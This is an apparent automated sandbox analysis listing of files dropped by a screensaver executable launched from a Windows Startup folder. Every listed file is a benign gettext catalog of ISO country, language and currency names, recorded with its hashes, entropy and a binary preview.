                                                                                                    SSDEEP:6:ilijn1YYxqZCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG9PXmBQ8KMW0YEi9:i4n1xxq8t02Ukx/iximCg5ITmPXmBQWk
                                                                                                    MD5:DDAD72FDDFC5C9ABDEECFCC202887191
                                                                                                    SHA1:5CB104DF518A211CDF775071489277EDC8D6BA14
                                                                                                    SHA-256:5C976A8B58DDAB3C9EAC46A8D5214138E51EFD4660B73E7C46C8739369AED848
                                                                                                    SHA-512:BC87648B8978A1BEFCC81C8CDE8E69E500E41ABA4A22FDA0FE5D0DC346EBFFA0BDF1509BBA865C966BCCE799A2EE39ADFAF19DC25A7E9447BDC73A72B3029AD1
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 115 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5119
                                                                                                    Entropy (8bit):4.675355836426427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:WPJbohDUKdH8Y2302+WG4h+yB4dTgE6ctK997yMqe0gEgSyDkiu:WBbo2y8Yd2Z3hWdT/Lt8GO0/gNRu
                                                                                                    MD5:B7C9721711B3109805EAE93924722680
                                                                                                    SHA1:BD9FFB9B86394C83E55CA69418EA89B9005CDBF7
                                                                                                    SHA-256:996232268819CC37A14F060A9B15CAF1B769764DA1971EE99035F446DF45064B
                                                                                                    SHA-512:229526BA518981880187D9E124472E53012DCF0F84BF2D0DF63E2400D146FB01EB81F63E855279065CF19B8415F9379C498BB8ADF4E87DF69BE0E31FBE0DEBF6
                                                                                                    Malicious:false
                                                                                                    Preview:........s...............L.......................................................................................................$.......+.......3.......J.......S.......Z.......g.......o.......x...............................................................................................................................................#.......+.......1.......8.......?.......F.......L.......V.......^.......d.......n.......s.......z.......................................................................................................................................................................&...............6.......<.......H.......N.......V.......].......b.......k.......r............................................................................................................... .......(.......5.......A.......K.......Q.......X.......c.......l.......u.......................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 423 messages, Project-Id-Version: iso_3166-1 '\320\220\321\203\322\223\320\260\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29652
                                                                                                    Entropy (8bit):5.321734535072368
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:nakI2pMbgtmsWP4XWAIRZOnKstRYpxC/WlYAv3CrAd07GYOZryRMLbrK3Wt6lHkN:n3MUsZOBtRYpxC/WlYy3CrAi7GNZWsfn
                                                                                                    MD5:7A9371DD0BF9AA523527B78C609D7AF2
                                                                                                    SHA1:92BF71C5119B76C92259D497DBD2E08A4E71F23E
                                                                                                    SHA-256:E5FE6240B7C455F90738B6D0D162BE68907C9CC3AE187C5A4008E6F597B9A1F5
                                                                                                    SHA-512:68649E4A75226886AE4F48045FA5DD027724CF137C91242B7CDC39F2A1FF833FDD2E514097065232EA9654D54AA91214929E4EE0125C8301AE1CD3047B3EA250
                                                                                                    Malicious:false
                                                                                                    Preview:................T...9...........p#......q#......}#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......'$......2$......:$......B$......M$......V$......^$......f$......m$......s$......{$.. ....$.......$.......$.. ....$.......$.......%.......%.......%......!%......@%......W%......i%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&..,...K&......x&.......&..%....&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....'..,...-'.."...Z'..*...}'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......%(......-(......6(......?(......[(..'...i(..$....(.......(.......(.......(.......)......))......G)......L)......T)......[)......i)......z).......).......).......).......).......).......).......).......).......).......).......*.......*.......*......#*......(*......2*......;*......B*......P*......W*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\322\260\320\273\321\213\320\261\321\200\320\270\321\202\320\260\320\275\320\270\321\217\320\275\321\213\322\243 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\320\264\320\260 \320\220\320\271\320\274\320\260\322\223\321\213'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3237
                                                                                                    Entropy (8bit):5.5686202720476015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADEk7hvGqIfdvqNuoUGYrlJhF2xPcMNpcv+eyxPEf1C8jWoo:qDEk7hyBoDY32cMNpc2emMffS
                                                                                                    MD5:2A6839F868888BB497E761790241897B
                                                                                                    SHA1:D0D552650EFD2C95E4332E8A6F906D8783B3B8F7
                                                                                                    SHA-256:5B96DFD3641AE4FB33F40590478E10171D4100E0B68738200A4DF7773D12F19B
                                                                                                    SHA-512:1B53C2E6DF4C9D710B8D646A70A1AA00249124017612FB24DB468C59403D1FEAFAFF2598E125FDDF23CB1AB0B6D05693DAFC105D673F0B9ECAAFC8B4D64DC950
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................>...1...K...p...........7.......^...........i... ...x...........$.......).......2.......D...1...5...v...................:...........#...&...A...N...h...$.......(...............!.......?...4...Q...t...2.......B...........<...I...R................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):530
                                                                                                    Entropy (8bit):5.299511447747916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4rxxLtt02UkcVt//xtLLnk/4FOEb/SXmBQWiOWRl:R1jt0Uyvk/TEbKXmGRl
                                                                                                    MD5:5402B30B62EBEFBA247088E1A8F91472
                                                                                                    SHA1:729F83B85FE69AA4662F1364C87340A327B69CD4
                                                                                                    SHA-256:93CD425D7E30EBACC6616D9E2C6FF90BFEC7F03AEA83CFB14A77930ED2BCA5FE
                                                                                                    SHA-512:F80256D9D444F3DEA9FD6A0801DAAA9753C2B2008E64C7CC1EF7246EC6D5F518C1416B9CAFC7D94E6D85416E11940FF4989B546EFB4E064F44CF941A355ECA3F
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 05:38+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Greenlandic <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kl/>.Language: kl.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\341\236\242\341\236\266\341\236\240\341\237\222\341\236\234\341\236\240\341\237\222\341\236\200\341\236\266\341\236\223\341\236\270\341\236\237\341\237\222\341\236\220\341\236\266\341\236\223'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36282
                                                                                                    Entropy (8bit):4.9817191638876555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oQ/ic+48fmsWP48WAIs9EyPzLqFXtacXIxxdWHqG1EMGG1lkJinSJBX9LcvpBF6:bWic+488T4ggyn
                                                                                                    MD5:544D9FB5397E4ABDF2B9B19267FF28CF
                                                                                                    SHA1:42C0F855F527927F0EAF7803662899A5C557B0F9
                                                                                                    SHA-256:DC54C2F1167A7388CDD6727FD8C69CE56719F521CBE37373BBA835C8545CA2B8
                                                                                                    SHA-512:615C090D55903893B9387D1EC9C1C3931F2820C475F15D03C90AD36E1990E5B2810A2C5251239EE4D6489875D1D1285FD16DEA21B8DF9E5B75A138D3A65F3320
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.169755126273227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGxWWXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITqvXmBQWi9
                                                                                                    MD5:DEE28A905BEE520A3F5B85A35C735C70
                                                                                                    SHA1:03CE84CB8FE57B6522396CE0525AB5C9D1F69829
                                                                                                    SHA-256:69130EDB914BBAE26C5DCFD7DB5574F41F55DC2B5DB3E9C6EE407C971DDA2606
                                                                                                    SHA-512:EFD97C371EA879CFB2EEA14903DC76BFF8027902322C8D0C381E6F65466D9FF4517B056DFF9BBBB5A327C7148A622B338897ECA8BCE6A9BDDE61675C33A44F3C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: km.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\341\236\242\341\236\266\341\236\216\341\236\266\341\236\205\341\236\200\341\237\222\341\236\232\342\200\213\342\200\213\342\200\213\342\200\213\341\236\242\341\236\204\341\237\213\341\236\217\341\236\266\341\236\200\341\236\221\341\236\267\341\236\205 \341\236\205\341\236\200\341\237\222\341\236\232\341\236\227\341\236\226\342\200\213\341\236\242\341\236\204\341\237\213\341\236\202\341\237\222\341\236\233\341\237\201\341\236\237'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4069
                                                                                                    Entropy (8bit):5.255870086715308
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDmD9yBoDl4TCTnioJ/5Sx0VLtfB3GhHSQXHRnThah4X0VXle0VX6h9:qDmDnRhh5SGLxB3GhHS+vdYXlLXi
                                                                                                    MD5:7D1F66E5E9E77CC927008E4B7671CFFE
                                                                                                    SHA1:4FB49E0AABEB5FC314BFD2444F1DC72F51511C83
                                                                                                    SHA-256:62494850B2D4DF8A5FE0325E51416CFE627E804D95FF8DBE399B35A72BABFBDE
                                                                                                    SHA-512:450FC909445BA34DB2B7C998CE1EE9C8BD0E8D8053373C28238AEB01B2326EDF7F1A4662B58D9A023EF895B9543647916BD2B770820AFAC4FE2276DAF3B9D747
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................m...9...0.......t.......I...M...l...............3.......'...Q...=...y...U.......................C...$...!...h...!.......-.......*.......'.......i...-...9.......C...............6...%...~...\...V.......R...2.......................'...4............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 58 messages, Project-Id-Version: iso_4217 '\341\236\242\341\236\266\341\236\240\341\237\222\341\236\234\341\236\240\341\237\222\341\236\202\341\236\266\341\236\223\341\236\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5396
                                                                                                    Entropy (8bit):5.009235110209708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kfZtF9P8PSWgdmnhsd80qTnHjmwW6S78T6V9JLp1qTFf9LywdHvLg:kh9P8LgdR80QnHaf78T6V9JvsV8wdHDg
                                                                                                    MD5:9D390676C26CBFA432D1919CD52053A8
                                                                                                    SHA1:953B24D77CCA3BA75E0D6E6C8089F4B3730A9125
                                                                                                    SHA-256:C7A67DB990D0706081A55CC35E2C6F0776F56D9EB98A5AB132ED5B6B140D2DDB
                                                                                                    SHA-512:6D591B2E5F464F325D22DDF8D221F62F8C36071FC0517BD448B3D322B4C55CBC713B14FC7DF754813C3407A89DC5ABE5E88B80935CCF27B7C19ADC1A45822C78
                                                                                                    Malicious:false
                                                                                                    Preview:........:...........O...................................................-.......;.......M.......^.......n.......}.......................................................................................$.......3.......C.......T.......c.......y.......................................................................................................$.......3.......Q.......c.......v...............................................................................................-.......6.......@.......P...!...,...+...N.......z...".......%.......4.......7...'...+..._...........+......."...................)..."...B...+...e...%.......4.......[.......(...H...1...q...+.......1.......:.......1...<...C...n...+.......................(...<...%...e...7.......(...............4......."...A...1...d...........%.......+.......(.......7.......4...f...4...............1.......7..."...+...Z...........+.......S.......%...5...F...[...+.......O.......[.......g...z...1...........)...........0...........$...1...4.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: ISO-falan-ku 'Efxanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21966
                                                                                                    Entropy (8bit):5.074168254199782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2NhFQtAqBP6ffNQ1bjA5wsOP4XjOAIbus0DHjn/DroL1z8J/g2:IWAqBPkQ1kmsOP4XjOAIOjn/DroL1m
                                                                                                    MD5:01CDEE3F661F0AFEB544B96FAE67431A
                                                                                                    SHA1:BAE898BFA7C20DF8D0B299FB8CF6F9B08404C5F1
                                                                                                    SHA-256:CC604D6C5D0B50DAA1D5A4C040809F33987E4BF74263DBDD979847FC8A2FFF9A
                                                                                                    SHA-512:4E2C87269D6856E5E5B24FD40D64ECB2CB9469B2E9EFA74D3248CF597EED7767151C028062BCACA63B8C70B6DFB38C5C7F4787922517693330FC54FE7E0C22C6
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$......3$......8$......>$......D$......U$......m$......v$.......$..,....$.......$.......$..%....$.......%.......%......$%......,%......1%......:%......A%......P%......X%..%...g%..,....%.."....%..*....%.......&.......&.......&......"&......5&......Q&......Y&......_&......k&......}&.......&.......&.......&.......&..'....&.......&.......'...... '......?'......]'......b'......j'......q'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......&(.......(......9(......>(......H(......Q(......X(......f(......m(......s(..!....(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: ISO-falan-ku 'Her\303\252ma \303\216ng\303\256l\303\256z a Antarkt\303\256ka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2695
                                                                                                    Entropy (8bit):5.2853589398435235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADC1I/SEMvGqIfdvqNuuAUQI/2GyzCT+DmIYhwIn:qDwI/yyBuA1I/VyGSUwI
                                                                                                    MD5:22865EE12CE1EF1121200EE3268200B8
                                                                                                    SHA1:B60AB439E2CECA9525D7CDF9A403007DD1413B43
                                                                                                    SHA-256:872322A57F3D0D749AB3F52DF8D247071BE9B3DD0E4CB2A5E1A075C78E8DAFA8
                                                                                                    SHA-512:9C6D84B9F82A8B31409F4F517E391C248FAB478A86BFC2A6E870FB7722C3B081B3AB77F07B2923696FB59F04E1785541E33490C54716D8FD845FDD24D51AE48E
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c................... ...y...........%.............../...........'......./.......E.......V.......g...+...........................................................)...$...8.......].......v...................'.......................$...........;.../...I.......y........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6 messages, Project-Id-Version: iso_639-3 'Soran\303\256'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):770
                                                                                                    Entropy (8bit):5.3239100262530785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iYtQt9lVeilJDu/Xxq7it02UkwVY/rglg2LLFok/4l5NXAvq2bp9vXmBQWiOWr5G:JoBlRUXVt0Ugsbeok/2Xqp9vXmGNG
                                                                                                    MD5:56182E3128B92CBA55D9859CB9738B3A
                                                                                                    SHA1:FAA4598A5C916EA274EC00419B14FDB452E04F9D
                                                                                                    SHA-256:CE56E3974EBA61C99C52F65CB1AAFC9421F71186E3B813F1A3B7745B5C230C6B
                                                                                                    SHA-512:91A9FA8FD8D62C3564A40232DBD97040060FC939B23FE3DD4E83B78FFE0DAC32A0186F316ABBE5BC707FF35287C0E5163BA569C9E565934DA2620030CC0AA295
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|................................................................................................................................................Central Kurdish.Kurdish.Kurdish, Central.Kurdish, Northern.Northern Kurdish.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-01-14 11:56+0000.Last-Translator: P..eroja pa.eroj. <cyax1@protonmail.com>.Language-Team: Kurdish (Northern) <https://hosted.weblate.org/projects/iso-codes/iso-639-3/kmr/>.Language: kmr.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.10.1..Soran..Kurd..Soran..Kurmanc..Kurmanc..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 383 messages, Project-Id-Version: iso_3166-1 '\340\262\205\340\262\253\340\263\215\340\262\227\340\262\276\340\262\250\340\262\277\340\262\270\340\263\215\340\262\245\340\262\276\340\262\250\340\263\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29606
                                                                                                    Entropy (8bit):5.040583054214674
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VLxb8NdItDyubsfP4Y2CA0UcXcbCjGHL/LRANQ46Na7rMMJKUl0e2gjnQAjNlE5I:BxANnaGGeGHLTRYQ46Na7rMMJA1Wnbe+
                                                                                                    MD5:772395F941D0BB8012C92162BE5C92CF
                                                                                                    SHA1:B6E180D048123E49F16F7FFF648969D702295224
                                                                                                    SHA-256:4FA76DC8F028943DE64E417E9C5CC4CA3C894809DA8F5EE2B23956875677FED0
                                                                                                    SHA-512:A47F01BEA87E3E733FFDB015DB34537EF636AA40890D4D887A2F3C8A1BE84E93BA9CE4DD339024342105FCD3F88CF8943D2F52A6A7A0FF674885756DE544B3BC
                                                                                                    Malicious:false
                                                                                                    Preview:................................0 ......1 ......= ......E ......M ......\ ......d ......k ......t ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!......&!......-!......3!......;!.. ...B!......c!......k!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......G"......L"......R"......X"......i"......."......."......."..,...."......."......."..%...."...... #......-#......8#......@#......E#......L#......[#..%...j#..,....#.."....#..*....#.......$.......$.......$......%$......8$......T$......\$......b$......n$.......$.......$.......$.......$.......$..'....$.......$.......%......#%......B%......`%......e%......m%......t%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......)&......1&......<&......A&......K&......T&......[&......i&......p&......v&..!....&.......&.......&.......&..0....&.......'.......'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):419
                                                                                                    Entropy (8bit):5.254693224946392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijMYYxA9Ct0vOuvP0NXzff4UaZD/RfQ3e5L2AFr83XmBQ8KMW0YEiR8A:i4Mxxjt02UkxaR/CgLLo3XmBQWiR8A
                                                                                                    MD5:6A47F9E9B378D6CF90E25877EE5A9DA9
                                                                                                    SHA1:0AF79088955270E8B789FF8209748F42826160D7
                                                                                                    SHA-256:A599CEE3F86F89D794EA47FAAA10CDBEBEDF1AC144411AFE434EFDE9397BAE7D
                                                                                                    SHA-512:EFC5C74339EDDE2D3319DBC54F3CFAB2EA74385211DC29D768C9A041C57A749B261F4CA6A1357FAD8911BADCCED30E4106C411782CCA54E783DFC4D0B2931223
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...i...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2007-05-03 14:19+0530.Last-Translator: Vikram Vincent <vincentvikram@gmail.com>.Language-Team: Kannada.Language: kn.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.11.4..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6480 messages, Project-Id-Version: iso_639-3 '\340\262\205\340\262\260\340\263\200\340\262\257\340\262\260\340\263\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):390349
                                                                                                    Entropy (8bit):5.202929459619201
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:TpZWCh26h9dYVN6dtoHPaNJFidyKDSUN+cLlCUTYl/hJwv7MW9ZBhCA/nHlUoriI:TKUfHrMPNlLlCUTYl/hJwv7/9ZBhCA/T
                                                                                                    MD5:DAED8042E7A9AC79D51B17855FD95B00
                                                                                                    SHA1:49E2324CEF05CEF924E69F9AD15FBE9249205AD4
                                                                                                    SHA-256:01808C761F0D8DD6A9530552183CD40999AB2B8C15FAEDF8D6AA36F4D2E98D24
                                                                                                    SHA-512:B01DC93EEE5FD59AC97335CB3D4B350B8172CF151DEAD892E2D9D3F53EC8568624F318ADAAA5EF9A5B72446647D02983170D2111C8CF46E0F9F845CF5A18D2F6
                                                                                                    Malicious:false
                                                                                                    Preview:........P............!.......... .......!.......*.......4.......?.......D.......K.......Q.......].......e.......j.......o.......u.......|...............................................................................................................................................................................%.......4.......=.......L.......R.......Y.......^.......v.......|....................................................................................................................................................................... .......*.......2.......:.......@.......N.......T.......Y......._.......f.......j.......o...............................................................................%.......0.......7.......@.......F.......P.......Z.......a.......f.......n.......s.......z................................................................................................................................ ....... ...... ......& ......, ......C ......F ......J ......R ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 51 messages, Project-Id-Version: iso_15924 '\354\225\204\353\236\215\354\226\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2668
                                                                                                    Entropy (8bit):5.307428232978575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PwqJS7s1dChVk2nx1BPJKXBlUZaRtj6jAwyjUBPHwWkkGCE:I6S7sPi2QHBPJWBl9fj6j7yjuPHwQGP
                                                                                                    MD5:8211834E9CEAC8E9A0D94C416B09190F
                                                                                                    SHA1:73093BA46D7F633CC57B073417813A0DA860121B
                                                                                                    SHA-256:3644728029743E0B9FD79C4AAD317DF8D70263857E3A50C8B1431D72C5FD7238
                                                                                                    SHA-512:639A3C102BABCEB22068CFD305F5E365777350020E380F403E6519AA17A9A3D19026BEEB02DB4A321500F2F26C539CE66BC20578BAA7550BCAA2CD8EE895C066
                                                                                                    Malicious:false
                                                                                                    Preview:........3...........G...L.......h.......i.......p.......y....................................................................................................................................................................... .......'.......+.......1.......7.......@.......J.......T.......`.......f.......l.......t...................................................................................................%...........................................................................................$...............;.......H.......R.......f.......t.......~.......................................................................................................).......9.......I.......S.......n.......{.......................................................................................................#.......0.......@.......[.......e...........-...3..........."...................................)...............................................................&...........0...........,...%...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\354\225\204\355\224\204\352\260\200\353\213\210\354\212\244\355\203\204'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24296
                                                                                                    Entropy (8bit):5.635005016639599
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosf+K3CMmURSm46nbjz5wsWP48WAINiZGOwc7MK04zfCW5yKWSQPY2qD:0ow3CMmoSm48fmsWP48WAIYwc7k4z75D
                                                                                                    MD5:0FE0BFFD52E7E950553996CDC4AACA87
                                                                                                    SHA1:D059D5C8D6FBAA1292744889D1BA3CFB4484E9C6
                                                                                                    SHA-256:B2B7FD296881BF2F0CB32AC9D578FE99A543F193652D3B6BEC2D6825F7B2882A
                                                                                                    SHA-512:7F7AED24FFB81D78689123E8A3C3E06646250C52A205CA3716D298D29E10F99203D8F0DF76DAE93E5761F018E45B94D211A6A930DEE458D56AF6097F029733DB
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 90 messages, Project-Id-Version: iso_3166-2 '\354\225\214\353\235\274\353\260\224\353\247\210\354\226\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4513
                                                                                                    Entropy (8bit):5.34140241148341
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:g7rbRZHs1Dk6urUVmXS4MtyU1pxZaw/f96b4E4hkicovpEuMRNV:4rdZaDk6EXuyU+wy4hkhovpEuMfV
                                                                                                    MD5:0DE39A19AF9CC1FCFDEE8EDA657C138C
                                                                                                    SHA1:0DB027C7B7E9D432754E9B69AAD3AE0B553D7AD6
                                                                                                    SHA-256:3EF798FD8AA692BE32E774F36799E290C122280014E6E87A938F9A9EE243079A
